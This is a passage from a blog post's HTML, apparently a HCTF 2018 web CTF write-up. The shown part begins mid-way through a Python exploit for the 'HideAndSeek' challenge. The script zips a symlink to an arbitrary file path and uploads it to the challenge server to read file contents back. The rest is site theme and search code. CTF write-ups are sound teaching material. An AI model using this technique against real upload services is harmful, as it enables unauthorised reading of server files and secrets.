&#123;&#125;&quot;.format(path,link_namme))</span><br><span class="line">    print &quot;ln -s &#123;&#125; &#123;&#125;&quot;.format(path,link_namme)</span><br><span class="line">    os.system(&quot;zip -y &#123;&#125; &#123;&#125;&quot;.format(zip_name,link_namme))</span><br><span class="line">    with open(zip_name,&apos;r&apos;) as f:</span><br><span class="line">        data = f.read()</span><br><span class="line">    return zip_name,data</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def exp(path,i):</span><br><span class="line">    zip_name,data = generate_zip(path,i)</span><br><span class="line">    # zip_name,data = rewrite(path,i)</span><br><span class="line">    session = requests.Session()</span><br><span class="line">    paramsPost = &#123;&quot;submit&quot;:&quot;Submit&quot;&#125;</span><br><span class="line">    paramsMultipart = [(&apos;the_file&apos;, (zip_name, data, &apos;application/zip&apos;))]</span><br><span class="line">    headers = &#123;&quot;Accept&quot;:&quot;text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8&quot;,&quot;Upgrade-Insecure-Requests&quot;:&quot;1&quot;,&quot;User-Agent&quot;:&quot;Mozilla/5.0 (Linux; Android 9.0; SAMSUNG-SM-T377A Build/NMF26X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Mobile Safari/537.36&quot;,&quot;Referer&quot;:&quot;http://hideandseek.2018.hctf.io/&quot;,&quot;Connection&quot;:&quot;close&quot;,&quot;Accept-Language&quot;:&quot;zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3&quot;,&quot;Accept-Encoding&quot;:&quot;gzip, deflate&quot;,&quot;DNT&quot;:&quot;1&quot;&#125;</span><br><span class="line">    cookies = &#123;&quot;session&quot;:&quot;eyJ1c2VybmFtZSI6Im1veGlhb3hpIn0.Dsf5zA.yM84QphtcfEoykAu2lwjxp7_QvI&quot;&#125;</span><br><span class="line">    response = session.post(&quot;http://hideandseek.2018.hctf.io/upload&quot;, data=paramsPost, files=paramsMultipart, headers=headers, cookies=cookies)</span><br><span class="line"></span><br><span class="line">    print(&quot;Status code: %i&quot; % response.status_code)</span><br><span class="line">    print(&quot;Response body: %s&quot; % response.content)</span><br><span class="line">    if len(response.content)&gt;5:</span><br><span class="line">        # print(&quot;Response body: %s&quot; % response.content)</span><br><span class="line">        with open(&apos;out.txt&apos;,&apos;a+&apos;) as f:</span><br><span class="line">            f.write(&apos;\n\n&#123;&#125;\n\n&#123;&#125;&apos;.format(path,response.content)) </span><br><span class="line"></span><br><span class="line"></span><br><span class="line">if __name__==&apos;__main__&apos;:</span><br><span class="line">    name =  &apos;test&apos;+&apos;&apos;.join(random.sample(string.ascii_letters + string.digits, 4))</span><br><span class="line">    exp(sys.argv[1],name)</span><br></pre></td></tr></table></figure></p>

      
    </div>

    

    
    
    

	
    

    

    
      <div>
        <ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>Post author:  </strong>Passer6y</li>
  <li class="post-copyright-link">
    <strong>Post link: </strong>
    <a href="http://0day.design/2019/02/05/HCTF 2018 Web WriteUp/" title="HCTF 2018 Web Writeup">http://0day.design/2019/02/05/HCTF 2018 Web WriteUp/</a>
  </li>
  <li class="post-copyright-license">
    <strong>Copyright Notice:  </strong>true</li>
</ul>

      </div>
    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/CTF/" rel="tag"><i class="fa fa-tag"></i> CTF</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/01/29/CSS Tricks/" rel="next" title="CSS Tricks">
                <i class="fa fa-chevron-left"></i> CSS Tricks
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/02/09/按键精灵学习记录/" rel="prev" title="按键精灵学习记录">
                按键精灵学习记录 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          

  
    <div class="comments" id="comments">
    </div>
  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/21.jpg"
                alt="Passer6y" />
            
              <p class="site-author-name" itemprop="name">Passer6y</p>
              <p class="site-description motion-element" itemprop="description">A salty fish</p>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives">
                
                    <span class="site-state-item-count">24</span>
                    <span class="site-state-item-name">posts</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-categories">
                  <a href="/categories/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">4</span>
                    <span class="site-state-item-name">categories</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-tags">
                  <a href="/tags/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">6</span>
                    <span class="site-state-item-name">tags</span>
                  </a>
                </div>
              
            </nav>
          

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          
            <div class="links-of-author motion-element">
              
                <span class="links-of-author-item">
                  <a href="https://github.com/passer6y" target="_blank" title="GitHub"><i class="fa fa-fw fa-github"></i>GitHub</a>
                  
                </span>
              
                <span class="links-of-author-item">
                  <a href="mailto:passer6y@d0g3.cn" target="_blank" title="E-Mail"><i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  
                </span>
              
            </div>
          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-inline">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="http://ph0rse.me/" title="Ph0rse" target="_blank">Ph0rse</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://hpdoger.me/" title="Hpdoger" target="_blank">Hpdoger</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://hu3sky.ooo/" title="Hu3sky" target="_blank">Hu3sky</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.0akarma.com/" title="0akarma" target="_blank">0akarma</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.cnblogs.com/H4lo" title="H4lo" target="_blank">H4lo</a>
                  </li>
                
              </ul>
            </div>
          

          
            
          
          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#Kzone"><span class="nav-number">1.</span> <span class="nav-text">Kzone</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#HideAndSeek"><span class="nav-number">2.</span> <span class="nav-text">HideAndSeek</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<div class="copyright">&copy; 2017 &mdash; <span itemprop="copyrightYear">2019</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Passer6y</span>

  

  
</div>









<div class="theme-info">
  <div class="powered-by"></div>
  <span class="post-count">博客全站共52.2k字</span>
</div>

<span id="busuanzi_container_site_pv" class="theme-info">
&nbsp;&nbsp;|&nbsp;&nbsp;本站总访问量<span id="busuanzi_value_site_pv"></span>次
  </span>
  <span id="busuanzi_container_site_uv" class="theme-info">
&nbsp;&nbsp;|&nbsp;&nbsp;本站访客数<span id="busuanzi_value_site_uv"></span>人次
  </span>

<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
        








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>


























  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=6.3.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=6.3.0"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=6.3.0"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=6.3.0"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=6.3.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=6.3.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=6.3.0"></script>



  



	





  





  








  <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
  
  
  <script src="//unpkg.com/valine/dist/Valine.min.js"></script>
  
  <script type="text/javascript">
    var GUEST = ['nick','mail','link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(function (item) {
      return GUEST.indexOf(item)>-1;
    });
    new Valine({
        el: '#comments' ,
        verify: true,
        notify: false,
        appId: '3Jm4JutlBzR7fb3fxICb50pS-gzGzoHsz',
        appKey: 'TDRlM3HCI03SteHoOtVxJIMS',
        placeholder: 'Just go go',
        avatar:'mm',
        guest_info:guest,
        pageSize:'10' || 10,
    });
  </script>



  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>




  
  
  
  <link rel="stylesheet" href="/lib/algolia-instant-search/instantsearch.min.css">

  
  
  <script src="/lib/algolia-instant-search/instantsearch.min.js"></script>
  

  <script src="/js/src/algolia-search.js?v=6.3.0"></script>



  

  

  

  

  
  

  

  

  

  

  
  <style>
    .copy-btn {
      display: inline-block;
      padding: 6px 12px;
      font-size: 13px;
      font-weight: 700;
      line-height: 20px;
      color: #333;
      white-space: nowrap;
      vertical-align: middle;
      cursor: pointer;
      background-color: #eee;
      background-image: linear-gradient(#fcfcfc, #eee);
      border: 1px solid #d5d5d5;
      border-radius: 3px;
      user-select: none;
      outline: 0;
    }

    .highlight-wrap .copy-btn {
      transition: opacity .3s ease-in-out;
      opacity: 0;
      padding: 2px 6px;
      position: absolute;
      right: 4px;
      top: 8px;
    }

    .highlight-wrap:hover .copy-btn,
    .highlight-wrap .copy-btn:focus {
      opacity: 1
    }

    .highlight-wrap {
      position: relative;
    }
  </style>
  <script>
    $('.highlight').each(function (i, e) {
      var $wrap = $('<div>').addClass('highlight-wrap')
      $(e).after($wrap)
      $wrap.append($('<button>').addClass('copy-btn').append('Copy').on('click', function (e) {
        var code = $(this).parent().find('.code').find('.line').map(function (i, e) {
          return $(e).text()
        }).toArray().join('\n')
        var ta = document.createElement('textarea')
        document.body.appendChild(ta)
        ta.style.position = 'absolute'
        ta.style.top = '0px'
        ta.style.left = '0px'
        ta.value = code
        ta.select()
        ta.focus()
        var result = document.execCommand('copy')
        document.body.removeChild(ta)
        
          if(result)$(this).text('Copied')
          else $(this).text('Copy failed')
        
        $(this).blur()
      })).on('mouseleave', function (e) {
        var $b = $(this).find('.copy-btn')
        setTimeout(function () {
          $b.text('Copy')
        }, 300)
      }).append(e)
    })
  </script>


</body>
</html>
